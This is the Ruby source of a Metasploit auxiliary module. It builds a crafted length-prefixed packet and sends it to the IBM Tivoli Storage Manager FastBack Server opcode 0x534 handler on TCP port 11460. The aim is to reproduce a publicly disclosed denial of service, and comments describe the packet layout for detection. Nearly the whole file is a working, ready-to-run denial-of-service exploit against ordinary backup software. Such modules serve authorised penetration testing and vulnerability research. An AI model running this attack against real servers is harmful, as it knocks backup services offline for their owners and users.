
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/misc/ibm_tsm_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module that sends a single crafted request to the IBM Tivoli
# Storage Manager FastBack Server opcode 0x534 handler (default TCP port
# 11460) in order to reproduce the publicly disclosed denial of service
# listed under 'References'.
#
# Detection reference, derived from the code below: the request is a 4-byte
# big-endian length prefix, 12 random alphabetic bytes, then the opcode as a
# 32-bit little-endian value (stream offset 16), six further 32-bit
# little-endian words, 8 random alphabetic bytes, and three parameters.
# The first parameter follows the fixed template
# "File: ... From: 0 To: 0 ChunkLoc: 0 FileLoc: 0" with a 0x200-character
# file name.
#
# NOTE(review): the info hash declares no 'Notes' entry (Stability /
# SideEffects / Reliability). Confirm whether the service stays down or
# restarts after the request and record it there.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers the module metadata and the default remote port.
  #
  # @param info [Hash] caller-supplied metadata merged via update_info
  def initialize(info = {})
    module_details = {
      'Name' => 'IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service',
      'Description' => %q{
        This module exploits a denial of service condition present in IBM Tivoli Storage Manager
        FastBack Server when dealing with packets triggering the opcode 0x534 handler.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Gianni Gnesa', # Public disclosure/Proof of Concept
        'William Webb <william_webb[at]rapid7.com>', # Metasploit
      ],
      'References' => [
        ['EDB', '38979'],
        ['OSVDB', '132307']
      ],
      'DisclosureDate' => '2015-12-15',
    }
    super(update_info(info, module_details))

    # 11460 is only the default; RPORT remains operator-configurable.
    register_options([Opt::RPORT(11460)])
  end

  # Builds one length-prefixed request for the given opcode.
  #
  # The meaning of the individual header words is not documented in this
  # file; the comments below describe only how each value is derived.
  #
  # @param opcode [Integer] handler opcode, written as 32-bit little-endian
  # @param p1 [String] first parameter
  # @param p2 [String] second parameter
  # @param p3 [String] third parameter
  # @return [String] 4-byte big-endian body length followed by the body
  def tv_pkt(opcode, p1="", p2="", p3="")
    # 12 random alphabetic bytes precede the opcode.
    body = Rex::Text.rand_text_alpha(0x0C)

    # Seven 32-bit little-endian words: opcode, zero, then lengths derived
    # from the parameters (p1's length appears twice, followed by p2's,
    # their sum, and p3's).
    header_words = [
      opcode,
      0x00,
      p1.length,
      p1.length,
      p2.length,
      p1.length + p2.length,
      p3.length
    ]
    body += header_words.pack("V*")

    # 8 more random alphabetic bytes sit between the header and the parameters.
    body += Rex::Text.rand_text_alpha(0x08)

    body += p1 + p2 + p3

    # Outer framing: body length as a 32-bit big-endian integer.
    [body.length].pack("N") << body
  end

  # Connects to RHOST:RPORT, sends one opcode 0x534 request and disconnects.
  #
  # Connection-level failures are reported and logged rather than raised.
  # The method does not check afterwards whether the service is still
  # responding, so "Packet sent!" only confirms the write.
  def run
    opcode = 0x534
    connect
    print_status("Connected to: #{rhost} port: #{rport}")
    print_status("Sending malicious packet")

    # This file does not state which field the handler mishandles; the
    # parameters are reproduced exactly as in the referenced proof of concept.
    file_field = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0]
    second_field = Rex::Text.rand_text_alpha(0x60)
    third_field = Rex::Text.rand_text_alpha(0x60)

    request = tv_pkt(opcode, file_field, second_field, third_field)

    sock.put(request)
    print_status("Packet sent!")
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
    print_error("Exploit failed: #{e.class} #{e.message}")
    elog(e)
  ensure
    # Always release the socket, including after a failed connect.
    disconnect
  end
end